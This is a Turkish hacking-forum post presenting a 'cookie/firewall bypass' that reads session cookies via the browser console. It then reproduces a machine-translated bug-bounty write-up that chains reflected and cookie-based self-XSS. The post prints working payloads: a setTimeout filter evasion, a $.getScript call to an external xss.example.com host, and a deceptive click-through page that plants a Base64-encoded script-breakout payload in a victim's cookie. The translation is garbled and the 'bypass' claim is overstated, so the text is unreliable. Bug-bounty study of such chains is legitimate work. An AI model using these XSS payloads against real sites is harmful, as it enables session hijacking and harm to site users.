Çerez / Sunucu Güvenlik Duvarları Atlatma #Üst Düzey

Cyberdown

Üye
21 Haz 2020
154
5
|​
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|​
Çerez / Sunucu güvenlik duvarlarını baypass edelim. " Üst düzey çerez baypass metot" -> 0gün / Hadi Gidelim
|​
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|​
|​
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
|​
Let's bypass Cookie / Server firewalls. "High level cookie bypass method" -> 0days / Lets go.
|​
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
|​
İşlemler:
|
|​
1.) F12 Tuşuna bas.
|​
2.) console.log(belge.cookie); " Dosyayı ingilizceye kopyala Yapıştır. " ( Açıklama: hihi tht de olmadı değil mi? Bak şimdi. )
|​
3.) alert(belge.cookie); " Dosyayı ingilizceye çevir kopyala Yapıştır. " ( Şimdi? denediysen eğer oturum açılmış durumdaysanız == çerez |içerisinde oturum verileriniz de gelecek. Gizliden deneyebilirsiniz. Gizliden yapıldığında sadece aktivasyon verilerini verecek. )
|​
4.) Şimdi ise " php içerisinde curl, html, sade javascript kodları" istediğiniz yol ile çalıştırabilrsiniz ancak html kodunda ve php kodunda |göreceksiniz ki site içerisindeki filtrelemeler devreye girecektir. Bu sistemlerde yapılan waf baypass metodunu bilmiyorsanız konuyu |beğenip onun da gelmesini sağlayabilirsiniz.
|​
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|​
İngilizceden çevrilmiştir-HTTP 403, istenen kaynağa erişimin yasak olduğu anlamına gelen bir HTTP durum kodudur. Sunucu isteği |anladı, ancak yerine getirmeyecek.
|​
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|​
|Resimli anlatım:
|
|
|​
Örnekte görüldüğü üzere sadece sunucunun aktivasyon bilgileri dediğim bilgileri attı bize. Yani sen bu, şu, insan, robot, engellenmiş kişi, |adıyaman konumunda bulunan kişi vb....
|
|​
+++++++++++++++++++++
|
Cl6GWL.png

|​
++++++++++++++++++++++++++++++++++++++
|
|​
Şimdi anlamayan değerli insanlar olabilir. Şimdi bilmeyen kişiler ve/veya anlamayanlar için video ekledim" video da bikaç tüyo da var ":
|​
< VİDEO >
[|url]https://vimeo.com/520143483[/url]
|​
|Eğer anlamadıysanız onun da çözümü var değerli insanlar.
|​
|Self-XSS'i Good XSS'e Çevirmek anahtarı ile farklı kaynaklara da bakabilirsiniz.
|
|​
Örnek:
|​
https://laptrinhx.com/cookie-based-self-xss-to-good-xss-3104768763/
|​
https://www.netsparker.com.tr/blog/web-guvenligi/self-xss-i-good-xss-e-cevirmek/
|​
--------------------------------------------------------
|
|​
Şahsen ben ingilizce olanına bakardım. Bu arada hiçbir yerden alınmadı alıntılanmadı sadece ben tek mi keşfetmişim diye aratırıken karşıma çıkan sonuç hüsrana uğratsa da daha fazla içerik ile buluşturdu.
|
|​
İçeriğe gitmeye üşenenler için:
|
|​
|
|​
Cookie Based Self-XSS to Good XSS
|
|​
1*B83T2b3EVhmk60sxxK2oIg.png

|
|​
Geçen ay Synack Red Teams özel hata ödül platformuna kabul edildim ve programlarından birinde yansıyan bir XSS güvenlik açığı |keşfettim. Synack bug ödül programlarının özel doğası nedeniyle, bu yazıda hedeften bahsetmeyeceğim, ancak karşılaştığım bir dizi |farklı sınırlamayı nasıl yendiğimi göstereceğim. DOM olarak da bilinen Belge Nesne Modeli'ne erişimimin olduğunu kanıtlayamadığım için |bulduğum için başlangıçta 272 ABD doları aldım. DOM'a erişemememin nedeni, parantez karakterlerinin filtrelenmesi ve sonuç olarak |aşağıdaki gibi bir yükü yürütemememdi:
|​
|
Kod:
alert(********.domain)
|
|​
Normalde bu JavaScript işlevi, aşağıdaki ekran görüntüsünde gösterilen aşağıdaki yürütme ile sonuçlanır.
|
|​
1*B83T2b3EVhmk60sxxK2oIg.png

|
|​
DOM Erişimini gösteren uyarının (********.domain) yürütülmesi​
|
|​
Kod:
alert`********.domain`
|
|​
Parantez karakterleri filtrelendiğinden, işlevimi yürütmek için `karakterleri kullanmak zorunda kaldım. Ne yazık ki, aşağıdaki
|​
işlev
|​
çalıştırıldığında, aşağıdaki ekran görüntüsünde gösterilen DOM erişiminiz yoktur.
|
|​
1*vmfOs4dfrWSsjsczV62UlQ.png

|
|​
Raporu gönderdim ve 272 $ ile ödüllendirildim, ancak DOM erişimini elde edebilirsem bana bir bonus verileceği söylendi, bu yüzden doğal |olarak bu teklifi oldukça eğlenceli bir meydan okumaya dönüştüğümü kabul ettim. Brutelogic (Brute) ile konuştum ve ona bu sınırlamayı |aşmak için herhangi bir teknik bilip bilmediğini sordum ve XSS Cheat Sheet PDF belgesine başvurmamı söyledi. Belgeyi okurken aşağıda |listelenen aşağıdaki yük ile karşılaştım:
|
|​
Kod:
setTimeout`alert\x28********.domain\x29`
|​
Bu yük, tam olarak ihtiyacım olan şey olan DOM erişimini sağladı. DOM erişimini gösteren yeni yükümü yeniden gönderdim ve önceki
|​
ödememe ek olarak 60 ABD doları kazandım. Ancak henüz bitirmedim. Daha önce, hata ödül programı kapsamında olan farklı bir alt etki |alanında bir Self-XSS keşfettim. Bu XSS, Base64 kodlu bir XSS yükünü oturum tanımlama bilgisindeki bir parametreye yerleştirerek |oluştu. Çerez tabanlı XSS ​​güvenlik açıklarından, bir saldırgan çerez değeri ayarlayamadığı sürece yararlanılamaz. Neyse ki, yukarıda |bahsettiğim bir XSS güvenlik açığım zaten vardı. Ancak, bir sınırlamam vardı, o da yükümün çok fazla karakter olamayacağı, aksi takdirde |başarısız olacağıydı. Bu saldırının başarılı bir şekilde çalışması için yürütmem gereken JavaScript'in harici bir JavaScript dosyasından |gömülmesi gerektiğini biliyordum çünkü başarılı bir şekilde çalışmak için çok uzun sürdü. Düzgün çalışması için çok uzun olduğu için, |düzgün bir çerez ayarlamak için yükü içeren harici JavaScript dosyasını da yerleştiremiyordum. Ancak, güvenlik açığı bulunan sayfanın, |başarılı bir şekilde yürütmek için yeterince kısa bir komut dosyası yerleştirmeme izin veren jQuery kullandığını fark ettim. İşte kullandığım |başarılı kod:
|​
Kod:
$.getScript`//xss.example.com/xss.js`
|​
Şimdi, tek yapmam gereken, savunmasız çerez parametresini Base64 kodlu bir yüke ayarlayacak JavaScript dosyasını barındırmaktı. |Kullandığım kod şuna benziyordu:
|​
Kod:
$('html').html('<h1>Click the button below to continue.</h1><input type="submit" value="Click Me" onclick=setCookieRedir() />');
[LEFT]|[/LEFT]function setCookieRedir(){
[LEFT]| [/LEFT]       ********.cookie = [LEFT]|[/LEFT]"vulnerableCookie=LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v;path=/;domain=.example.com;";
[LEFT]|[/LEFT]	window.******** = "https://example.com/vulnerablePage.html";
[LEFT]|[/LEFT]}
[LEFT]|[/LEFT]
|​
Yukarıda yayınlanan kod, esasen web sayfasını "Devam etmek için aşağıdaki düğmeyi tıklayın" yazan başlık metniyle değiştirir. altında bir |düğme ile. Kurban düğmeyi tıkladığında, securityableCookie değerini aşağıdaki Base64 kodlu dizeye ayarlar:
|​
Kod:
LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v
|​
Base64 kodlu dize, aşağıdaki yükün kodunu çözer ve bu daha sonra savunmasız web sayfasına yansıtılır.
|​
Kod:
--></script><script>alert(********.domain);//
|​
Sonuç olarak, bunun çok ilginç bir güvenlik açığı zinciri olduğunu düşündüm ve süreç boyunca karşılaştığım çeşitli sınırlamalar için |baypas bulmakta çok eğlendim. Sonunda, bu güvenlik açığı zincirini mümkün kılan 272 $ + 60 $ 'a ek olarak bu Self-XSS'yi sömürülebilir |bir XSS'ye dönüştürdüğüm için 616 $ ile ödüllendirildim.
|​

-------------------------------------------------------------------------> The End

Son düzenleme:

Cyberdown

Üye
21 Haz 2020
154
5
Ellerinize sağlık hocam. Konu başarılı :)

Merhaba,

Değer verip yorum yaptığınız için teşekkür ederim. Başarımı kat kat artırmayı planlıyorum.

- Saygılarımla.
*Huzurlu hayatlar dilerim.

Hocam valla efsanesiniz .

Merhaba,

Övücü ve motive edici yorumun için teşekkür ederim devrem. Umarım işini görür veya bir parça olsun katkım olmuştur.

- Saygılarımla.
* Sağlıcakla Kalın.

Eline sağlık ama şu işaretler konu içerisinde pek hoş görünmüyor.

|
----
**

Hocam tavsiyelerinizi ve yapılabilecekleri bir liste halinde özelden iletirseniz veya yorum olarak iletirseniz çok sevinirim. Hatalarımı ilettiğiniz için müteşekkirim.

Ayrıca hatalı gördüğünüz kısımı ekran alıntısı şeklinde iletirseniz. Gözümden kaçmış ama sizin gözünüzün gördüğü hataları daha iyi görebilme şansım olur.

-Saygılarımla.
* Sağlıcakla Kalın.

Eline Sağlık, bilgilendirici ve başarılı bir konu olmuş. Fakat vepersında dediği gibi işaretler güzel gözükmüyor.

Güzel yorumunuz için teşekkür ederim. Hatalarımı gidermemde yardımcı olursanız sevinirim. Ekran alıntısı şeklinde gözünüzün gördüğü yerleri iletirseniz. Ayrıca şöyle daha iyi olurdu dediğiniz herhangi bir içerik var ise söylemeniz çok güzel olur.

-Saygılarımla.
*Sağlıcakla Kalın.

Eline sağlık dostum

Merhaba,

Değerli yorumun için teşekkür ederim.

-Saygılarımla.
*Sağlıcakla Kalın.

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.